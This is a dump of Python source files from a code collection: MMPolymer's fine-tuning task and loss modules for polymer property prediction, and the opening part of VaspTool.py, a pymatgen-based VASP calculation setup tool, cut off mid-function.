2,290,151 | __init__.py | FanmengWang_MMPolymer/MMPolymer/models/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from .MMPolymer import MMPolymerModel
from .transformer_encoder_with_pair import TransformerEncoderWithPair | 236 | Python | .py | 4 | 58 | 69 | 0.836207 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,152 | MMPolymer_finetune.py | FanmengWang_MMPolymer/MMPolymer/tasks/MMPolymer_finetune.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from unicore.data import (
Dictionary,
NestedDictionaryDataset,
LMDBDataset,
AppendTokenDataset,
PrependTokenDataset,
RightPadDataset,
SortDataset,
TokenizeDataset,
RightPadDataset2D,
RawLabelDataset,
RawArrayDataset,
FromNumpyDataset,
)
from MMPolymer.data import (
KeyDataset,
ConformerSampleDataset,
DistanceDataset,
EdgeTypeDataset,
RemoveHydrogenDataset,
AtomTypeDataset,
NormalizeDataset,
CroppingDataset,
RightPadDatasetCoord,
data_utils,
)
from MMPolymer.data.tta_dataset import TTADataset
from unicore.tasks import UnicoreTask, register_task
logger = logging.getLogger(__name__)
@register_task("MMPolymer_finetune")
class MMPolymerFinetuneTask(UnicoreTask):
"""Task for training transformer auto-encoder models."""
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", help="downstream data path")
parser.add_argument("--task-name", type=str, help="downstream task name")
parser.add_argument(
"--classification-head-name",
default="classification",
help="finetune downstream task name",
)
parser.add_argument(
"--num-classes",
default=1,
type=int,
help="finetune downstream task classes numbers",
)
parser.add_argument("--reg", action="store_true", help="regression task")
parser.add_argument("--no-shuffle", action="store_true", help="shuffle data")
parser.add_argument(
"--conf-size",
default=10,
type=int,
help="number of conformers generated with each molecule",
)
parser.add_argument(
"--remove-hydrogen",
action="store_true",
help="remove hydrogen atoms",
)
parser.add_argument(
"--remove-polar-hydrogen",
action="store_true",
help="remove polar hydrogen atoms",
)
parser.add_argument(
"--max-atoms",
type=int,
default=256,
help="selected maximum number of atoms in a molecule",
)
parser.add_argument(
"--dict-name",
default="dict.txt",
help="dictionary file",
)
parser.add_argument(
"--only-polar",
default=1,
type=int,
help="1: only reserve polar hydrogen; 0: no hydrogen; -1: all hydrogen ",
)
def __init__(self, args, dictionary):
super().__init__(args)
self.dictionary = dictionary
self.seed = args.seed
# add mask token
self.mask_idx = dictionary.add_symbol("[MASK]", is_special=True)
if self.args.only_polar > 0:
self.args.remove_polar_hydrogen = True
elif self.args.only_polar < 0:
self.args.remove_polar_hydrogen = False
else:
self.args.remove_hydrogen = True
@classmethod
def setup_task(cls, args, **kwargs):
dictionary = Dictionary.load(args.dict_name)
logger.info("dictionary: {} types".format(len(dictionary)))
return cls(args, dictionary)
def load_dataset(self, split, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the data scoure (e.g., train)
"""
split_path = os.path.join(self.args.data, self.args.task_name, split + ".lmdb")
dataset = LMDBDataset(split_path)
if split == "train":
tgt_dataset = KeyDataset(dataset, "target")
smi_dataset = KeyDataset(dataset, "smi")
sample_dataset = ConformerSampleDataset(
dataset, self.args.seed, "atoms", "coordinates"
)
dataset = AtomTypeDataset(dataset, sample_dataset)
else:
dataset = TTADataset(
dataset, self.args.seed, "atoms", "coordinates", self.args.conf_size
)
dataset = AtomTypeDataset(dataset, dataset)
tgt_dataset = KeyDataset(dataset, "target")
smi_dataset = KeyDataset(dataset, "smi")
dataset = RemoveHydrogenDataset(
dataset,
"atoms",
"coordinates",
self.args.remove_hydrogen,
self.args.remove_polar_hydrogen,
)
dataset = CroppingDataset(
dataset, self.seed, "atoms", "coordinates", self.args.max_atoms
)
dataset = NormalizeDataset(dataset, "coordinates", normalize_coord=True)
src_dataset = KeyDataset(dataset, "atoms")
src_dataset = TokenizeDataset(
src_dataset, self.dictionary, max_seq_len=self.args.max_seq_len
)
coord_dataset = KeyDataset(dataset, "coordinates")
def PrependAndAppend(dataset, pre_token, app_token):
dataset = PrependTokenDataset(dataset, pre_token)
return AppendTokenDataset(dataset, app_token)
src_dataset = PrependAndAppend(
src_dataset, self.dictionary.bos(), self.dictionary.eos()
)
edge_type = EdgeTypeDataset(src_dataset, len(self.dictionary))
coord_dataset = FromNumpyDataset(coord_dataset)
coord_dataset = PrependAndAppend(coord_dataset, 0.0, 0.0)
distance_dataset = DistanceDataset(coord_dataset)
input_ids_dataset = KeyDataset(dataset, "input_ids")
attention_mask_dataset = KeyDataset(dataset, "attention_mask")
nest_dataset = NestedDictionaryDataset(
{
"net_input": {
"src_tokens": RightPadDataset(
src_dataset,
pad_idx=self.dictionary.pad(),
),
"src_coord": RightPadDatasetCoord(
coord_dataset,
pad_idx=0,
),
"src_distance": RightPadDataset2D(
distance_dataset,
pad_idx=0,
),
"src_edge_type": RightPadDataset2D(
edge_type,
pad_idx=0,
),
"src_input_ids": input_ids_dataset,
"src_attention_mask": attention_mask_dataset,
},
"target": {
"finetune_target": RawLabelDataset(tgt_dataset),
},
"smi_name": RawArrayDataset(smi_dataset),
},
)
if not self.args.no_shuffle and split == "train":
with data_utils.numpy_seed(self.args.seed):
shuffle = np.random.permutation(len(src_dataset))
self.datasets[split] = SortDataset(
nest_dataset,
sort_order=[shuffle],
)
else:
self.datasets[split] = nest_dataset
def build_model(self, args):
from unicore import models
model = models.build_model(args, self)
return model
| 7,300 | Python | .py | 195 | 26.558974 | 87 | 0.577483 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,153 | __init__.py | FanmengWang_MMPolymer/MMPolymer/tasks/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from pathlib import Path
import importlib
# automatically import any Python files in the criterions/ directory
for file in sorted(Path(__file__).parent.glob("*.py")):
if not file.name.startswith("_"):
importlib.import_module("MMPolymer.tasks." + file.name[:-3])
| 404 | Python | .py | 8 | 47.75 | 69 | 0.746193 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,154 | MMPolymer_finetune.py | FanmengWang_MMPolymer/MMPolymer/losses/MMPolymer_finetune.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from unicore import metrics
from unicore.losses import UnicoreLoss, register_loss
from sklearn.metrics import r2_score
@register_loss("MMPolymer_finetune")
class MMPolymerFinetuneLoss(UnicoreLoss):
def __init__(self, task):
super().__init__(task)
def forward(self, model, sample, reduce=True):
net_output = model(
**sample["net_input"],
features_only=True,
classification_head_name=self.args.classification_head_name,
)
reg_output = net_output[0]
loss = self.compute_loss(model, reg_output, sample, reduce=reduce)
sample_size = sample["target"]["finetune_target"].size(0)
if not self.training:
logging_output = {
"loss": loss.data,
"predict": reg_output.view(-1, self.args.num_classes).data,
"target": sample["target"]["finetune_target"]
.view(-1, self.args.num_classes)
.data,
"smi_name": sample["smi_name"],
"sample_size": sample_size,
"num_task": self.args.num_classes,
"conf_size": self.args.conf_size,
"bsz": sample["target"]["finetune_target"].size(0),
}
else:
logging_output = {
"loss": loss.data,
"sample_size": sample_size,
"bsz": sample["target"]["finetune_target"].size(0),
}
return loss, sample_size, logging_output
def compute_loss(self, model, net_output, sample, reduce=True):
predicts = net_output.view(-1, self.args.num_classes).float()
targets = (
sample["target"]["finetune_target"].view(-1, self.args.num_classes).float()
)
loss = F.mse_loss(
predicts,
targets,
reduction="sum" if reduce else "none",
)
return loss
@staticmethod
def reduce_metrics(logging_outputs, split="valid") -> None:
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get("loss", 0) for log in logging_outputs)
sample_size = sum(log.get("sample_size", 0) for log in logging_outputs)
metrics.log_scalar(
"loss", loss_sum / sample_size / math.log(2), sample_size, round=3
)
if "valid" in split or "test" in split:
predicts = torch.cat([log.get("predict") for log in logging_outputs], dim=0)
if predicts.size(-1) == 1:
targets = torch.cat(
[log.get("target", 0) for log in logging_outputs], dim=0
)
smi_list = [
item for log in logging_outputs for item in log.get("smi_name")
]
df = pd.DataFrame(
{
"predict": predicts.view(-1).cpu(),
"target": targets.view(-1).cpu(),
"smi": smi_list,
}
)
mae = np.abs(df["predict"] - df["target"]).mean()
mse = ((df["predict"] - df["target"]) ** 2).mean()
df = df.groupby("smi").mean()
agg_mae = np.abs(df["predict"] - df["target"]).mean()
agg_mse = ((df["predict"] - df["target"]) ** 2).mean()
agg_r2 = r2_score(df["target"], df["predict"])
metrics.log_scalar(f"{split}_mae", mae, sample_size, round=3)
metrics.log_scalar(f"{split}_mse", mse, sample_size, round=3)
metrics.log_scalar(f"{split}_agg_mae", agg_mae, sample_size, round=3)
metrics.log_scalar(f"{split}_agg_mse", agg_mse, sample_size, round=3)
metrics.log_scalar(
f"{split}_agg_rmse", np.sqrt(agg_mse), sample_size, round=4
)
metrics.log_scalar(
f"{split}_agg_r2", agg_r2, sample_size, round=4
)
metrics.log_scalar(
f"{split}_agg_reg", agg_r2 - np.sqrt(agg_mse), sample_size, round=4
)
@staticmethod
def logging_outputs_can_be_summed(is_train) -> bool:
"""
Whether the logging outputs returned by `forward` can be summed
across workers prior to calling `reduce_metrics`. Setting this
to True will improves distributed training speed.
"""
return is_train | 4,745 | Python | .py | 105 | 32.266667 | 88 | 0.54031 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,155 | __init__.py | FanmengWang_MMPolymer/MMPolymer/losses/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from pathlib import Path
import importlib
# automatically import any Python files in the criterions/ directory
for file in sorted(Path(__file__).parent.glob("*.py")):
if not file.name.startswith("_"):
importlib.import_module("MMPolymer.losses." + file.name[:-3])
| 405 | Python | .py | 8 | 47.875 | 69 | 0.746835 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,156 | VaspTool.py | aboys-cb_VaspTool/VaspTool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : 兵
# @email : [email protected]
import logging
import sys
from pymatgen.util.typing import Tuple3Ints, Vector3D
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
stream=sys.stdout # 指定输出流为sys.stdout
)
__version__ = "1.5.0"
logging.info(f"VaspTool-{__version__}")
logging.info(f"开始初始化,请稍等...")
from functools import cached_property, partial
import matplotlib
matplotlib.use('Agg')
from ruamel.yaml.comments import CommentedMap
import abc
import argparse
import glob
import re
import shutil
from pathlib import Path
import numpy as np
import json
import traceback
import pandas as pd
import datetime
import os
import subprocess
from typing import *
from tqdm import tqdm
import math
from monty.os import cd
from monty.dev import requires
from monty.io import zopen
from monty.json import MontyEncoder, MontyDecoder
from monty.serialization import loadfn
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.core import Structure, Lattice, SETTINGS
from pymatgen.io.vasp.inputs import Incar, Poscar, Kpoints, VaspInput, Potcar, PotcarSingle
from pymatgen.io.vasp.outputs import Vasprun, BSVasprun, Outcar, Eigenval, Wavecar, Locpot
from pymatgen.io.lobster import Lobsterin, Lobsterout, Icohplist
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.electronic_structure.dos import CompleteDos
from pymatgen.electronic_structure.plotter import BSPlotter, DosPlotter, BSDOSPlotter
from pymatgen.symmetry.bandstructure import HighSymmKpath
from pymatgen.command_line.bader_caller import bader_analysis_from_path
from pymatgen.analysis.solar import slme
from pymatgen.analysis.eos import EOS
from pymatgen.io.ase import AseAtomsAdaptor
try:
from phonopy import Phonopy
from phonopy.file_IO import write_FORCE_CONSTANTS, write_disp_yaml, write_FORCE_SETS
from phonopy.interface.calculator import get_default_physical_units
from phonopy.interface.phonopy_yaml import PhonopyYaml
from phonopy.phonon.band_structure import get_band_qpoints_and_path_connections
from pymatgen.io import phonopy
except:
Phonopy = None
try:
from ase.io import read as ase_read
from ase.io import write as ase_write
except:
ase_write = None
ase_read = None
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
if os.path.exists("./config.yaml"):
conf_path = "./config.yaml"
elif Path(__file__).with_name("config.yaml").exists():
conf_path = Path(__file__).with_name("config.yaml").as_posix()
else:
logging.error("在运行路径或者VaspTool.py路径下必须要有一个config.yaml!")
exit()
logging.info(f"使用配置文件:{conf_path}")
config = loadfn(conf_path)
config: CommentedMap
SETTINGS["PMG_DEFAULT_FUNCTIONAL"] = r"PBE_54"
SETTINGS["PMG_VASP_PSP_DIR"] = os.path.expanduser(os.path.expandvars(config["SETTING"]["PMG_VASP_PSP_DIR"]))
plt.rc('font', family='Times New Roman')
warnings.filterwarnings("ignore", module="pymatgen")
PotcarSingle.functional_dir["PBE_54"] = ""
FUNCTION_TYPE = ["pbe", "pbesol", "hse", "scan", "r2scan", "mbj", "gw", "bse"]
KPOINTS_TYPE = Union[int, tuple, list]
setting = config.get("SETTING", {})
potcar_config = config.get("POTCAR", {}).get("PBE54")
potcar_gw_config = config.get("POTCAR", {}).get("GW")
# step_base_incar 是基于pbe最基本的设置 其他泛函需要更改的在function_base_incar
step_base_incar = {
"sr": {
"add": {
"LWAVE": False, "LCHARG": False, "NSW": 500, "ISIF": 3, "IBRION": 2, "ALGO": "Normal"
},
"remove": []
},
"scf": {
"add": {
"LWAVE": True, "LCHARG": True, "NSW": 0, "IBRION": -1
},
"remove": []
},
"dos": {
"add": {
"ISTART": 1, "ISMEAR": 0, "ICHARG": 11, "NSW": 0, "IBRION": -1, "LORBIT": 11,
"NEDOS": 3000, "LWAVE": False, "LCHARG": False
},
"remove": []
},
"band": {
"add": {
"ISTART": 1, "ICHARG": 11, "NSW": 0, "IBRION": -1, "LORBIT": 11, "LWAVE": False, "LCHARG": False
},
"remove": []
},
"optic": {
"add": {
"ISTART": 1, "NSW": 0, "LWAVE": False,
"LCHARG": False, "LOPTICS": True, "NBANDS": 96,
"NEDOS": 2000, "CSHIF": 0.100, "IBRION": 8
},
"remove": []
},
"elastic": {
"add": {
"ISTART": 0, "ISIF": 3, "IBRION": 6, "LWAVE": False, "LCHARG": False,
"PREC": "Accurate", "ADDGRID": True, "LREAL": False, "NSW": 1,
"NFREE": 2
},
"remove": ["NPAR", "NCORE"]
},
"dielectric": {
"add": {
"ISTART": 1, "SIGMA": 0.05, "LEPSILON": True, "LPEAD": True, "IBRION": 8, "LWAVE": False, "LCHARG": False
},
"remove": ["NPAR", "NCORE"]
},
"aimd": {
"add": {
"ALGO": "Normal", "IBRION": 0, "MDALGO": 2, "ISYM": 0,
"POTIM": 1, "NSW": 3000, "TEBEG": 300, "TEEND": 300,
"SMASS": 1, "LREAL": "Auto", "ISIF": 2, "ADDGRID": True
},
"remove": []
},
}
# 这个都是非pbe的一些补充
function_base_incar = {
"hse": {
"base": {
"add": {
"HFSCREEN": 0.2, "AEXX": 0.25, "LHFCALC": True, "PRECFOCK": "N"
},
"remove": []
},
"steps": {
"scf": {
"ISTART": 1, "ALGO": "Damped", "ICHARG": 0
},
"dos": {"ALGO": "Normal", "ICHARG": 1,
},
"band": {
"ALGO": "Normal",
"ICHARG": 1,
},
"optic": {"ICHARG": 2, "LREAL": False, "ALGO": "Normal", "IBRION": -1}
}
},
"pbesol": {
"base": {
"add": {"GGA": "PS"},
"remove": []
},
"steps": {
}
},
"scan": {
"base": {
"add": {"METAGGA": "SCAN", "ALGO": "ALL", "LASPH": True,
"LUSE_VDW": True, "BPARAM": 15.7, "CPARAM": 0.0093},
"remove": ["GGA"]
},
"steps": {
"scf": {"ALGO": "ALL", "ICHARG": 2},
"dos": {"ICHARG": 1},
"band": {"ICHARG": 1},
}
},
"r2scan": {
"base": {
"add": {"METAGGA": "R2SCAN", "LASPH": True,
"LUSE_VDW": True, "BPARAM": 11.95, "CPARAM": 0.0093},
"remove": ["GGA"]
},
"steps": {
"scf": {"ALGO": "ALL", "ICHARG": 2},
"dos": {"ICHARG": 1},
"band": {"ICHARG": 1, "LREAL": False, },
}
},
"mbj": {
"base": {
"add": {"ALGO": "Exact", "LOPTICS": True,
"CSHIFT": 0.1, "NEDOS": 2000, "ISTART": 1},
"remove": ["GGA"]
},
"steps": {
"dos": {"ICHARG": 2},
"band": {"ICHARG": 1},
}
},
"gw": {
"base": {
"add": {"ALGO": "EVGW0", "LSPECTRAL": True, "NELMGW": 1,
"ISTART": 1, "LOPTICS": True, "LREAL": False
},
"remove": ["NPAR", "NCORE"]
},
"steps": {
}
},
"bse": {
"base": {
"add": {"ALGO": "BSE", "LSPECTRAL": True, "NELMGW": 1,
"ISTART": 1, "LOPTICS": True, "LREAL": False,
"NBANDSO": 4, "NBANDSV": 20, "OMEGAMAX": 60
},
"remove": ["NPAR", "NCORE"]
},
"steps": {
}
},
}
def hash_file(obj, file_path):
with open(file_path, "r", encoding="utf8") as f:
data = f.read()
hash1 = hash(data)
hash2 = hash(str(obj))
return hash1 == hash2
def get_pot_symbols(species, mode: Literal["pbe54", "gw"] = "pbe54"):
"""
根据传入 返回赝势列表
:param species:
:param mode:
:return:
"""
symbols = []
for i in species:
if mode == "pbe54":
v = potcar_config[i.name]
elif mode == "gw":
v = potcar_gw_config[i.name]
else:
break
if symbols:
if symbols[-1] == v:
continue
symbols.append(v)
return symbols
def cp_file(source_file: Path, destination_dir: Path) -> None:
"""
复制文件
:param source_file: 要复制的文件
:param destination_dir: 希望复制到的路径
:return:
"""
src_files = glob.glob(source_file.as_posix())
for i in src_files:
logging.debug(f"\t复制文件:{i} -> {destination_dir.as_posix()}")
shutil.copy(i, destination_dir.as_posix())
return
def get_command_path(command_name):
return get_command_result(['which', command_name])
def get_command_result(cmd):
try:
# 使用 subprocess 调用 which 命令,并捕获输出
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# 检查命令是否成功执行
if result.returncode == 0:
# 返回命令的路径
return result.stdout.strip()
else:
# 如果命令未找到,返回 None 或抛出异常
return None
except Exception as e:
logging.error(f"An error occurred: {e}")
return None
def check_in_out_file(path):
in_out_file = ["INCAR", "POSCAR", "KPOINTS", "POTCAR", "OUTCAR"]
return all([os.path.exists(os.path.join(path, i)) for i in in_out_file])
def array_to_dat(file_path, x_array, *data_array, headers: list = []):
x_array = x_array.reshape(1, -1)
all_data_array = np.array(data_array)
result = None
with open(file_path, "w", encoding="utf8") as f:
f.write("# " + "".join(map(lambda x: f"{x:<15}", headers)) + '\n')
f.write(f"# GroupSize & Groups: {all_data_array.shape[2]} {all_data_array.shape[1]}" '\n')
for i in range(all_data_array.shape[1]):
if i % 2 == 0:
single = np.vstack([x_array, all_data_array[:, i, :]])
else:
single = np.vstack([np.flip(x_array), np.flip(all_data_array[:, i, :], axis=1)])
f.write('\n')
for row in single.T:
f.write("".join(map(lambda x: f"{x:<15.8f} " if not isinstance(x, dict) else f"{x} ", row)) + '\n')
# np.savetxt(f,single.T, delimiter=" ", fmt='%f',comments="",header=header)
# 将xyz 获取的
def write_to_xyz(vaspxml_path, save_path, Config_type, append=True):
if setting.get("ExportXYZ"):
if ase_read is None:
logging.error("设置开启了导出xyz文件,但没有安装ase,请 pip install ase")
else:
atoms_list = []
atoms = ase_read(vaspxml_path, index=":")
index = 1
for atom in atoms:
xx, yy, zz, yz, xz, xy = -atom.calc.results['stress'] * atom.get_volume() # *160.21766
atom.info['virial'] = np.array([(xx, xy, xz), (xy, yy, yz), (xz, yz, zz)])
atom.calc.results['energy'] = atom.calc.results['free_energy']
atom.info['Config_type'] = Config_type + str(index)
atom.info['Weight'] = 1.0
del atom.calc.results['stress']
del atom.calc.results['free_energy']
atoms_list.append(atom)
index += 1
ase_write(save_path, atoms_list, format='extxyz', append=append)
def store_dataframe_as_json(dataframe, filename, orient="split"):
with zopen(filename, "w") as f:
data = json.dumps(dataframe.to_dict(orient=orient), cls=MontyEncoder)
f.write(data)
def load_dataframe_from_json(filename, pbar=True, decode=True):
# Progress bar for reading file with hook
pbar1 = tqdm(desc=f"Reading file {filename}", position=0, leave=True, ascii=True, disable=not pbar)
# Progress bar for decoding objects
pbar2 = tqdm(desc=f"Decoding objects from {filename}", position=0, leave=True, ascii=True, disable=not pbar)
with zopen(filename, "rb") as f:
dataframe_data = json.load(f, cls=MontyDecoder)
pbar1.close()
pbar2.close()
if isinstance(dataframe_data, dict):
if set(dataframe_data.keys()) == {"data", "columns", "index"}:
return pd.DataFrame(**dataframe_data)
else:
return pd.DataFrame(dataframe_data)
def read_dataframe_from_file(file_path: Path, duplicated=True, **kwargs) -> pd.DataFrame:
"""
从指定路径读取结构 可以是文件夹路径、结构路径
Returns: (pd.DataFrame)
"""
if file_path.is_dir():
systems = []
for p in file_path.iterdir():
try:
s = read_dataframe_from_file(p, False)
systems.append(s)
except:
logging.warning(f"读取结构文件{p}失败。")
pass
df = pd.concat(systems)
else:
if file_path.suffix.endswith(".json"):
df = load_dataframe_from_json(file_path, **kwargs)
elif file_path.name.endswith("POSCAR") or file_path.suffix in [".cif", ".vasp"]:
struct = Structure.from_file(file_path)
struct.remove_oxidation_states()
if setting.get("UseInputFileName", False):
system = file_path.stem
else:
system = struct.composition.to_pretty_string()
df = pd.DataFrame([{"system": system,
"structure": struct}])
elif file_path.name.endswith("xyz"):
systems = []
if ase_read is None:
logging.error("xyz文件必须安装ase,请 pip install ase 安装!")
return pd.DataFrame()
atoms = ase_read(file_path, index=":", format="extxyz", do_not_split_by_at_sign=True)
for atom in atoms:
struct = AseAtomsAdaptor.get_structure(atom)
# xyz 分子式一样 所以加个数字标识下
systems.append({"system": struct.composition.to_pretty_string(),
"structure": struct})
df = pd.DataFrame(systems)
else:
raise ValueError(f"仅支持后缀为POSCAR、cif、vasp、json、xyz类型的文件")
if duplicated:
df.reset_index(drop=True, inplace=True)
duplicated = df[df.duplicated("system", False)]
group = duplicated.groupby("system")
df["group_number"] = group.cumcount()
df["group_number"] = df["group_number"].fillna(-1)
df["group_number"] = df["group_number"].astype(int)
df['system'] = df.apply(
lambda row: f"{row['system']}-{row['group_number'] + 1}" if row['group_number'] >= 0 else row['system'],
axis=1)
df.drop("group_number", inplace=True, axis=1)
df.reset_index(drop=True, inplace=True)
return df
def verify_path(path: Path) -> None:
"""
会检查是否存在路径,若不存在,则创建该路径,支持多级目录创建
:param path:
:return:
"""
if not path.exists():
# path.mkdir()
os.makedirs(path)
def get_vacuum_axis(structure: Structure, vacuum_size=10):
"""
判断真空层所在的轴 大于5A的控件被判定为真空轴
没有返回None
:param structure:
:return:
"""
coords = np.array([site.coords for site in structure.sites])
maxcoords = np.max(coords, axis=0)
mincoords = np.min(coords, axis=0)
if (structure.lattice.a - maxcoords[0]) + (mincoords[0]) > vacuum_size:
return 0
elif (structure.lattice.b - maxcoords[1]) + (mincoords[1]) > vacuum_size:
return 1
elif (structure.lattice.c - maxcoords[2]) + (mincoords[2]) > vacuum_size:
return 2
else:
return None
class BaseIncar(Incar):
PBE_EDIFF = 1e-06
PBE_EDIFFG = -0.01
HSE_EDIFF = 1e-04
HSE_EDIFFG = -0.01
ENCUT = 500
def __init__(self, params: dict = None, **kwargs):
super().__init__(params)
self.update(kwargs)
@classmethod
def build(cls, system: str, function: FUNCTION_TYPE = "pbe", **kwargs):
base = config.get("INCAR").copy()
base: dict
# 不同泛函的基本参数
# 关于杂化泛函 ICHARG=1比ICHARG=2快一倍 但是能量稍微差一点
# Si2 hse dos
# ICHARG=1: CBM:6.3352 VBM:5.3661 dos_gap:0.9691 耗费时间:30min
# ICHARG=2: CBM:6.3218 VBM:5.3525 dos_gap:0.9693 耗费时间:12min
# ---------------------------------------------------------------------
step_incar = step_base_incar[system]
base.update(step_incar["add"])
for i in step_incar["remove"]:
if i in base:
base.pop(i)
if function != "pbe":
function_incar = function_base_incar[function]
base.update(function_incar["base"]["add"])
for i in function_incar["base"]["remove"]:
if i in base:
base.pop(i)
step_function_incar = function_incar["steps"].get(system)
if step_function_incar:
base.update(step_function_incar)
base.update(kwargs)
return cls(base)
def has_magnetic(self, structure):
"""
根据元素周期表判断体系是否具有磁性,如果有就打开自旋。
:return: 返回(bool,str)
"""
magmom = []
spin = []
_ = [0, 0]
for site in structure.sites:
if site.species_string in config.get("MAGMOM").keys():
mag = config.get("MAGMOM")[site.species_string]
spin.append(True)
elif site.specie.name in config.get("MAGMOM").keys():
mag = config.get("MAGMOM")[site.specie.name]
spin.append(True)
else:
mag = 0
spin.append(False)
if _[1] == mag:
_[0] += 1
else:
magmom.append(f"{_[0]}*{_[1]}")
_ = [1, mag]
magmom.append(f"{_[0]}*{_[1]}")
if any(spin):
self["ISPIN"] = 2
self["MAGMOM"] = " ".join(magmom)
def auto_encut(self, structure: Structure, pseudopotential="pbe54"):
max_encut = 0
for symbol in get_pot_symbols(structure.species, pseudopotential):
single = PotcarSingle.from_symbol_and_functional(symbol, functional="PBE_54")
if max_encut < single.enmax:
max_encut = single.enmax
encut = int(setting.get("ENCUTScale") * max_encut)
self["ENCUT"] = encut
logging.info(f"\t截断能根据{setting.get('ENCUTScale')}倍取值:{encut}")
class BaseKpoints:
_instance = None
init_flag = False
def __new__(cls, *args):
if cls._instance is None:
cls._instance = object.__new__(cls)
return cls._instance
def __init__(self, kpoints_type="Gamma"):
if BaseKpoints.init_flag:
return
BaseKpoints.init_flag = True
self.kpoints_type = kpoints_type
self.kpoints = config.get("KPOINTS")
def get_kpoint_setting(self, job_type: str, step_type: str, function: str):
if job_type not in self.kpoints.keys():
return 30
if step_type not in self.kpoints[job_type].keys():
return 30
if function not in self.kpoints[job_type][step_type].keys():
function = "default"
return self.kpoints[job_type][step_type][function]
@classmethod
def automatic_density(cls, structure: Structure, kppa: float) -> Tuple3Ints:
if math.fabs((math.floor(kppa ** (1 / 3) + 0.5)) ** 3 - kppa) < 1:
kppa += kppa * 0.01
lattice = structure.lattice
lengths: Vector3D = lattice.abc
ngrid = kppa / len(structure)
mult: float = (ngrid * lengths[0] * lengths[1] * lengths[2]) ** (1 / 3)
num_div: Tuple3Ints = cast(Tuple3Ints, [math.floor(max(mult / length, 1)) for length in lengths])
return num_div
@classmethod
def automatic_density_by_lengths(
cls, structure: Structure, length_densities: Sequence[float]
) -> Tuple3Ints:
if len(length_densities) != 3:
raise ValueError(f"The dimensions of length_densities must be 3, not {len(length_densities)}")
lattice = structure.lattice
abc = lattice.abc
num_div: Tuple3Ints = tuple(math.ceil(ld / abc[idx]) for idx, ld in enumerate(length_densities))
return num_div
def get_kpoints(self, job_type: str, step_type: str, function: str, structure: Structure):
kp = self.get_kpoint_setting(job_type, step_type, function)
if isinstance(kp, (int, float)):
if kp >= 100:
kp = self.automatic_density(structure, kp)
else:
kps = [kp, kp, kp]
vacuum = get_vacuum_axis(structure, 10)
if vacuum is not None:
kps[vacuum] = 1
kp = self.automatic_density_by_lengths(structure, kps)
logging.info(f"\t网格K点:{kp}")
if self.kpoints_type.upper().startswith("M"):
return Kpoints.monkhorst_automatic(kp)
return Kpoints.gamma_automatic(kp)
def get_line_kpoints(self, path: Path, function: str, structure: Structure, job_type="band_structure",
step_type="band") -> Kpoints:
if function == "pbe":
if os.path.exists("./HIGHPATH"):
kpoints = Kpoints.from_file("./HIGHPATH")
logging.info("使用自定义的高对称路径文件!")
# 下面这个循环 是将伽马点转换希腊字符,画图时的用
for i, k in enumerate(kpoints.labels):
if "gamma" in k.lower():
kpoints.labels[i] = "$\\Gamma$"
else:
kpath = HighSymmKpath(structure, path_type="hinuma")
kpoints = Kpoints.automatic_linemode(self.get_kpoint_setting(job_type, step_type, function), kpath)
# 下面这个循环 是将伽马点转换希腊字符,画图时的用
for i, k in enumerate(kpoints.labels):
if "gamma" in k.lower():
kpoints.labels[i] = "$\\Gamma$"
return kpoints
if path.joinpath("pbe/band/vasprun.xml").exists():
pbe_vasprun = BSVasprun(path.joinpath("pbe/band/vasprun.xml").as_posix())
pbe_kpoints = Kpoints.from_file(path.joinpath("pbe/band/KPOINTS").as_posix())
kpoints1 = Kpoints.from_file(path.joinpath("pbe/scf/IBZKPT").as_posix())
kpoints = Kpoints("Generated by VaspTool ", kpoints1.num_kpts + len(pbe_vasprun.actual_kpoints),
style=Kpoints.supported_modes.Reciprocal,
kpts=kpoints1.kpts + pbe_vasprun.actual_kpoints,
kpts_weights=kpoints1.kpts_weights + [0 for i in range(len(pbe_vasprun.actual_kpoints))])
lables = []
for k in kpoints.kpts:
if k in pbe_kpoints.kpts:
lables.append(pbe_kpoints.labels[pbe_kpoints.kpts.index(k)])
else:
lables.append(None)
kpoints.labels = lables
return kpoints
else:
kpts: list[float | None] = []
weights: list[float | None] = []
all_labels: list[str | None] = []
kp = self.get_kpoint_setting(job_type, "scf", function)
if isinstance(kp, int):
grid = Kpoints.automatic_density(structure, kp).kpts[0]
else:
grid = kp
ir_kpts = SpacegroupAnalyzer(structure, symprec=0.1).get_ir_reciprocal_mesh(grid)
for k in ir_kpts:
kpts.append(k[0])
weights.append(int(k[1]))
all_labels.append(None)
# for line mode only, add the symmetry lines w/zero weight
kpath = HighSymmKpath(structure, path_type="hinuma")
frac_k_points, labels = kpath.get_kpoints(
line_density=self.get_kpoint_setting(job_type, step_type, function), coords_are_cartesian=False
)
for k, f in enumerate(frac_k_points):
kpts.append(f)
weights.append(0.0)
all_labels.append(labels[k])
